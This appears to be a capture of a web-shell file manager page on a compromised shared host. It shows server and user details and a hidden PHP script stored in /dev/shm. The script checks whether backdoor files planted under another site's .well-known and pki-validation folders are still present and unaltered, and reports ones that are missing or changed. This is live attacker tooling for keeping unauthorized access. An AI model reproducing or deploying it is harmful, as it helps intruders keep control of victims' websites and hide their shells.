HEX
Server: LiteSpeed
System: Linux server161.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: imagzxcb (1058)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //dev/shm/.fac
<?php   $r = '/home/supelcjb/eccom.aqibawais.com'; $x = ["/.well-known/blockinstance.php"=>"bd@@1432077@@12",
"/lart.php"=>"bd@@1425699@@779",
"/.well-known/pki-validation/imatgelogin.php"=>"bd@@1435459@@54",
"/.well-known/pki-validation/imatgelogin.php"=>"bd@@1425683@@958",
"/lart.php"=>"bd@@1432048@@6",
"/.well-known/blockinstance.php"=>"bd@@1425539@@1060"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');